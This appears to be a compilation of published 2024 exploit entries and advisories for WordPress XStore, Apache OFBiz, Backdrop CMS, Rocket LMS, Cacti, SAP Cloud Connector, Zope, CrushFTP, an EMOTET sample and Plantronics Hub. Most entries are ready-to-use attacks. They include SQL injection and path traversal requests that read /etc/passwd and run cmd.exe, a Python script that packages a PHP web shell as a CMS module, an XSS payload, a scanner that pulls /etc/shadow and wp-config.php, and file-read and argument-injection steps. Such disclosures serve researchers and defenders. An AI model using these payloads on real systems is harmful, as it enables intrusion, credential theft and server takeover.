<pre><code># Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi<br /># Google Dork: N/A<br /># Date: 2024-05-16<br /># Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)<br /># Version: 5.3.5<br /># Tested on: Windows10<br /># CVE: CVE-2024-33559<br /><br /><br />Poc<br /><https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc><br /><br />POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1<br />Host: example.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: keep-alive<br />Upgrade-Insecure-Requests: 1<br /><br /></code></pre>
<pre><code># Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal<br /># Google Dork: N/A<br /># Date: 2024-05-16<br /># Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)<br /># Vendor Homepage: https://ofbiz.apache.org/<br />## Software Link: https://ofbiz.apache.org/download.html<br /># Version: below <=18.12.12<br /># Tested on: Windows10<br /><br /><br />Poc.<br />1-<br />POST /webtools/control/xmlrpc HTTP/1.1<br />Host: vulnerable-host.com<br />Content-Type: text/xml<br /><br /><?xml version="1.0"?><br /><methodCall><br /> <methodName>example.createBlogPost</methodName><br /> <params><br /> <param><br /> <value><string>../../../../../../etc/passwd</string></value><br /> </param><br /> </params><br /></methodCall><br /><br />OR<br /><br />2-<br />POST /webtools/control/xmlrpc HTTP/1.1<br />Host: vulnerable-host.com<br />Content-Type: text/xml<br /><br /><?xml version="1.0"?><br /><methodCall><br /> <methodName>performCommand</methodName><br /> <params><br /> <param><br /><br /><value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value><br /> </param><br /> </params><br /></methodCall><br /><br /></code></pre>
<pre><code># Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)<br /># Date: 04/27/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://backdropcms.org/<br /># Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip<br /># Version: latest<br /># Tested on: MacOS<br /><br />import os<br />import time<br />import zipfile<br /><br /><br /><br />def create_files():<br />info_content = """<br />type = module<br />name = Block<br />description = Controls the visual building blocks a page is constructed<br />with. Blocks are boxes of content rendered into an area, or region, of a<br />web page.<br />package = Layouts<br />tags[] = Blocks<br />tags[] = Site Architecture<br />version = BACKDROP_VERSION<br />backdrop = 1.x<br /><br />configure = admin/structure/block<br /><br />; Added by Backdrop CMS packaging script on 2024-03-07<br />project = backdrop<br />version = 1.27.1<br />timestamp = 1709862662<br />"""<br />shell_info_path = "shell/shell.info"<br />os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü<br />oluşturur<br />with open(shell_info_path, "w") as file:<br />file.write(info_content)<br /><br />shell_content = """<br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html><br />"""<br />shell_php_path = "shell/shell.php"<br />with open(shell_php_path, "w") as file:<br />file.write(shell_content)<br /><br />return shell_info_path, shell_php_path<br /><br />def create_zip(info_path, php_path):<br />zip_filename = "shell.zip"<br />with zipfile.ZipFile(zip_filename, 'w') as zipf:<br /># Dosyaları shell klasörü altında sakla<br />zipf.write(info_path, arcname='shell/shell.info')<br />zipf.write(php_path, arcname='shell/shell.php')<br />return zip_filename<br /><br />def main(url):<br />print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")<br />time.sleep(3)<br /><br />print("Evil module generating...")<br />time.sleep(2)<br /><br />info_path, php_path = create_files()<br />zip_filename = create_zip(info_path, php_path)<br /><br />print("Evil module generated!", zip_filename)<br />time.sleep(2)<br /><br />print("Go to " + url + "/admin/modules/install and upload the " +<br />zip_filename + " for Manual Installation.")<br />time.sleep(2)<br /><br />print("Your shell address:", url + "/modules/shell/shell.php")<br /><br />if __name__ == "__main__":<br />import sys<br />if len(sys.argv) < 2:<br />print("Usage: python script.py [url]")<br />else:<br />main(sys.argv[1])<br /> <br /><br /></code></pre>
<pre><code># Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)<br /># Date: 04/16/2024<br /># Exploit Author: Sergio Medeiros<br /># Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Software Link: https://lms.rocket-soft.org<br /># Version: 1.9<br /># Tested on Firefox and Chrome Browsers<br /># Patched Version: Patch Pending<br /># Category: Web Application<br /># CVE: CVE-2024-34241<br /># Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide<br /># PoC:<br /><br />In order to exploit this systemic stored XSS vulnerability, identify theareas in the web application which has a WYSIWIG editor used, for example, the create/edit course description section. <br />Input random text in the description section, and create the course while intercepting the request with BurpSuite or your preferred proxy of choice.<br /><br />In the *description* parameter or the associated parameter that is handling the user input related to the WYSIWIG editor, input the following payload and then issue the request:<br /><details/open/ontoggle=prompt(origin)><br /><br /></code></pre>
<pre><code>----------------------------------------------------------------<br />Cacti <= 1.2.26 (import.php) Remote Code Execution Vulnerability<br />----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://cacti.net<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.2.26 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located within the "import_package()" function<br />defined into the /lib/import.php script. This function blindly trusts<br />the filename and file content provided within the uploaded XML data,<br />and writes such files into the Cacti base path (or even outside, since<br />Path Traversal sequences are not filtered). This can be exploited to<br />write or overwrite arbitrary files on the web server, leading to<br />execution of arbitrary PHP code or other security impacts.<br /><br />Successful exploitation of this vulnerability requires an user account<br />having the "Import Templates" permission.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.2.27 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[17/01/2024] - Vendor notified through GitHub<br />[12/05/2024] - Version 1.2.27 released<br />[13/05/2024] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-25641 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2024-04<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240513-0 ><br />=======================================================================<br /> title: Tolerating Self-Signed Certificates<br /> product: SAP® Cloud Connector<br /> vulnerable version: 2.15.0 - 2.16.1 (Portable and Installer)<br /> fixed version: 2.16.2 (Portable and Installer)<br /> CVE number: CVE-2024-25642<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2023-11-13<br /> by: Mingshuo Li (Office Munich)<br /> Fabian Hagg<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The Cloud Connector is an optional on-premise component that is needed to<br />integrate on-demand applications with customer backend services and is the<br />counterpart of SAP Connectivity service."<br /><br />Source: https://tools.hana.ondemand.com/#cloud<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends to implement the security note 3424610, where the<br />documented issue is fixed in version 2.16.2 according to the vendor. We<br />advise installing the correction as a matter of priority to keep<br />business-critical data secured.<br /><br />Source: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/february-2024.html<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Tolerating Self-Signed Certificates (CVE-2024-25642)<br />As per vendor documentation, the authentication between SCC and SAP BTP is guaranteed<br />mutually:<br /><br />"The tunnel itself is using TLS with strong encryption of the communication,<br />and mutual authentication of both communication sides, the client side<br />(Cloud Connector) and the server side (SAP BTP)."<br /><br />Source: https://help.sap.com/docs/connectivity/sap-btp-connectivity-cf/inbound-connectivity#tls-tunnel<br /><br />It was however discovered that the SCC trusts self-signed X.509 server certificates<br />for transport security to establish outbound connections with cloud-related<br />endpoints. Thus, an attacker can impersonate the genuine servers to interact<br />with the SCC, hence breaking the mutual authentication promise. Our analysis shows<br />furthermore that the product does not implement Certificate Pinning for the<br />trusted endpoints.<br /><br />The security impact of this vulnerability is rated high due to the trust put<br />into self-signed certificates, SCC is unable to distinguish between genuine and<br />malicious SAP BTP endpoints, rendering trivial adversary-in-the-middle attacks<br />possible.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Tolerating Self-Signed Certificates (CVE-2024-25642)<br />A "tunnel" established between a subaccount of SAP BTP and SCC represents a<br />long-lived bi-directional WebSocket over TLS customized by the vendor.<br />Such a tunnel is initiated by the SCC, known as reverse invoke approach,<br />to give the administrator full control of the tunnel.<br /><br />Two tunnels established by SCC are protected by TLS with respect to encrypted<br />communication. However, SCC does not verify the authenticity of the<br />certification authority, hence allowing an attacker to impersonate the target<br />server, using self-signed certificates.<br /><br />In particular, the attack is targeted at the following two endpoints, but not<br />limited to the region host us10.<br /><br />- connectivitynotification.cf.us10.hana.ondemand.com<br />- connectivity.us10.trial.applicationstudio.cloud.sap<br /><br />Note that the following endpoint, which is used for the initial certificate<br />signing request by SCC and to receive the BTP subaccount credentials, is<br />not susceptible to this issue.<br /><br />- connectivitycertsigning.cf.us10.hana.ondemand.com<br /><br />Nonetheless, it suffices to silently eavesdrop and manipulate network traffic<br />between SCC and SAP BTP by impersonating the two vulnerable endpoints above.<br /><br />Without loss of generality, the first endpoint is taken as example to<br />demonstrate the issue by the following steps:<br /><br />1. Add an entry in /etc/hosts of the SCC host as below to resolve the host name<br /> to an attacker-controlled IP address:<br /><br /> 192.168.1.100 connectivitynotification.cf.us10.hana.ondemand.com<br /><br />2. Generate a self-signed certificate with the spoofed hostname as common name<br /><br />```<br />$ openssl req -x509 -newkey rsa:4096 -keyout conn-noti-key.pem -out conn-noti-cert.pem -sha256 -days 3650 -nodes -subj "/C=DE/ST=Baden-Wuerttemberg/L=Walldorf/O=SAP <br />SE/OU=ITSecurity/CN=connectivitynotification.cf.us10.hana.ondemand.com"<br />```<br /><br />3. Start an HTTPS server on the attacker machine to receive the connection from<br /> SCC, using the self-signed certificate created in step 2<br /><br />The following Python script can be used to start the HTTPS server:<br />```<br />$ cat https-dummy-server.py<br />import http.server<br />import ssl<br /><br />server_address = ("192.168.1.100", 443)<br />httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)<br />httpd.socket = ssl.wrap_socket(httpd.socket,<br /> server_side=True,<br /> certfile="self-signed-cert/conn-noti-cert.pem",<br /> keyfile="self-signed-cert/conn-noti-key.pem",<br /> ssl_version=ssl.PROTOCOL_TLS)<br />httpd.serve_forever()<br />```<br /><br />4. Connect to a subaccount of BTP, for example US East AWS, in the SCC<br /> Administration UI<br /><br />As soon as the connection is launched, the dummy web server will receive the<br />request as shown below:<br /><br />```<br />$ python3 https-dummy-server.py<br />192.168.1.200 - - [10/Nov/2023 12:00:00] "GET /connectivity HTTP/1.1" 200 -<br />```<br /><br />This observation confirms that the TLS connection between SCC and the spoofed<br />BTP endpoint operated on the attacker's machine has been successfully established<br />although the server presented a self-signed certificate. No security warning<br />message is being displayed in the Administration UI, making the attack<br />surreptitious.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested which were the latest versions available<br />at the time of the test:<br /><br />* SAP Cloud Connector Linux x86_64 Version 2.16.0<br />* SAP Cloud Connector Linux (Portable) x86_64 Version 2.16.0<br /><br />According to the vendor, the vulnerability is a regression and affects the<br />versions 2.15.0 - 2.16.1.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-11-14: Contacting vendor through vulnerability submission web form<br />2023-11-17: Vendor confirms receipt and assign SAP security incident numbers to<br /> the four submitted findings: 2370150975, 2370150977, 2370150994, 2370151022<br />2023-11-20: Vendor informs the reported issues be assigned the appropriate<br /> development teams for analysis<br />2023-12-05: Requesting status update<br />2023-12-05: Vendor informs that 2370151022 be rejected<br />2023-12-05: Issuing rebuttal for 2370151022<br />2023-12-06: Vendor contemplates further analysis<br />2023-12-14: Vendor decides not to take any action on 2370151022 and rejects<br /> 2370150977 and 2370150975 as well.<br />2023-12-15: Vendor accepts 2370150994<br />2024-01-05: Asked vendor to comment on the three rejected issues<br />2024-01-10: Vendor gives detailed rationale for the rejection of 2370150975<br />2024-01-12: Issuing rebuttal for 2370150975<br />2024-01-15: Vendor insists on rejection of 2370150975 and closes the ticket.<br /> Removing three rejected potential security issues from advisory.<br />2024-02-13: Release of SAP Security Patch Day, security note #3424610<br />2024-02-26: Asking for the disclosure guideline to publish finding 2370150994<br />2024-02-26: Vendor confirms the three-month embargo<br />2024-05-13: Coordinated release of SEC Consult advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version 2.16.2 which can be downloaded from their<br />website:<br />https://tools.hana.ondemand.com/#cloud<br /><br />Also see the vendor's security note #3424610 for further details:<br />https://me.sap.com/notes/3424610<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Li, F. Hagg / @2024<br /></code></pre>
<pre><code># Vulnerability Report<br /><br />## Title: Command Argument Injection Vulnerability in Zope WSGI Instance Creation Script Leading to RCE<br /><br />### Description:<br />A command Argument injection vulnerability has been identified in the Zope WSGI instance creation script used by the Zope web application server framework, which is maintained by the Zope Foundation. The script, mkwsgiinstance, facilitates the setup of new Zope WSGI application instances and involves specifying the Python interpreter among other parameters via command-line arguments. The flaw stems from insufficient validation of the Python interpreter path, allowing an attacker to execute arbitrary shell commands.<br /><br />### Affected Product:<br />Product: Zope WSGI instance creation script (mkwsgiinstance)<br />Version: All versions prior to the most recent update<br /><br />-Impact:<br />This vulnerability permits an attacker with local access to the server to execute arbitrary commands with the privileges of the user running the mkwsgiinstance script. The potential impacts include unauthorized information disclosure<br />### POC:<br /><br />```bash<br /><br />(env) root@lab:/opt/Zope# mkwsgiinstance -p "/usr/bin/mkdir" -d "/tmp/temp;"<br />Please choose a username and password for the initial user.<br />These will be the credentials you use to initially manage<br />your new Zope instance.<br /><br />Username: d<br />Password: <br />Verify password: <br />(env) root@lab:/opt/Zope# ls /tmp<br />'temp;'<br />```<br /><br />In this example, the attacker replaces the Python interpreter argument (-p) with the mkdir command, followed by an arbitrary directory path. Due to inadequate command-line argument sanitation, the script executes the mkdir command, thus illustrating arbitrary command execution.<br /><br />### Vulnerable Code Snippet:<br /><br />```python<br /><br />if opt in ("-p", "--python"):<br /> python = os.path.abspath(os.path.expanduser(arg))<br /> if not os.path.exists(python) and os.path.isfile(python):<br /> usage(sys.stderr, "The Python interpreter does not exist.")<br /> sys.exit(2)<br />```<br /><br />This code snippet fails to adequately validate the python variable that influences subprocess commands directly, enabling potential command injection when malicious inputs are utilized.<br /><br />CVSS Calculated Vulnerability Score:<br />https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />### Credits:<br /><br />This vulnerability was disclosed by Aymane MAZGUITI / Ilyase Dehy.<br /></code></pre>
<pre><code>## Exploit Title: CrushFTP Directory Traversal<br />## Google Dork: N/A<br /># Date: 2024-04-30<br /># Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)<br />## Vendor Homepage: https://www.crushftp.com/<br />## Software Link: https://www.crushftp.com/download/<br />## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)<br />## Tested on: Windows10<br /><br />import requests<br />import re<br /><br /># Regular expression to validate the URL<br />def is_valid_url(url):<br /> regex = re.compile(<br /> r'^(?:http|ftp)s?://' # http:// or https://<br /> r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...<br /> r'localhost|' # localhost...<br /> r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4<br /> r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6<br /> r'(?::\d+)?' # optional: port<br /> r'(?:/?|[/?]\S+)$', re.IGNORECASE)<br /> return re.match(regex, url) is not None<br /><br /># Function to scan for the vulnerability<br />def scan_for_vulnerability(url, target_files):<br /> print("Scanning for vulnerability in the following files:")<br /> for target_file in target_files:<br /> print(target_file)<br /><br /> for target_file in target_files:<br /> try:<br /> response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)<br /> if response.status_code == 200 and target_file.split('/')[-1] in response.text:<br /> print("vulnerability detected in file", target_file)<br /> print("Content of file", target_file, ":")<br /> print(response.text)<br /> else:<br /> print("vulnerability not detected or unexpected response for file", target_file)<br /> except requests.exceptions.RequestException as e:<br /> print("Error connecting to the server:", e)<br /><br /># User input<br />input_url = input("Enter the URL of the CrushFTP server: ")<br /><br /># Validate the URL<br />if is_valid_url(input_url):<br /> # Expanded list of allowed files<br /> target_files = [<br /> "/var/www/html/index.php",<br /> "/var/www/html/wp-config.php",<br /> "/etc/passwd",<br /> "/etc/shadow",<br /> "/etc/hosts",<br /> "/etc/ssh/sshd_config",<br /> "/etc/mysql/my.cnf",<br /> # Add more files as needed<br /> <br /> ]<br /> # Start the scan<br /> scan_for_vulnerability(input_url, target_files)<br />else:<br /> print("Invalid URL entered. Please enter a valid URL.")<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: TrojanSpy.Win64.EMOTET.A <br />Vulnerability: Arbitrary Code Execution<br />Description: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.<br />Family: EMOTET<br />Type: PE64<br />MD5: f917c77f60c3c1ac6dbbadbf366ddd30<br />SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486c<br />Vuln ID: MVID-2024-0684<br />Disclosure: 05/14/2024<br /><br />Exploit/PoC:<br />1) Download RansomLord v3<br /> https://github.com/malvuln/RansomLord<br />2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)<br />3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.<br />4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read<br /># Date: 2024-05-10<br /># Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from<br />Mastercard<br /># Vendor Homepage:<br />https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895<br /># Version: Plantronics Hub for Windows version 3.25.1<br /># Tested on: Windows 10/11<br /># CVE : CVE-2024-27460<br /><br />As a regular user drop a file called "MajorUpgrade.config" inside the<br />"C:\ProgramData\Plantronics\Spokes3G" directory. The content of<br />MajorUpgrade.config should look like the following one liner:<br />^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config<br /><br />Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy<br />(any file on the system). The desired file will be copied into C:\Program<br />Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp<br /><br />Steps to reproduce (POC):<br />- Open cmd.exe<br />- Navigate using cd C:\ProgramData\Plantronics\Spokes3G<br />- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config<br />- Desired file will be copied into C:\Program Files<br />(x86)\Plantronics\Spokes3G\UpdateServiceTemp<br /> <br /><br /></code></pre>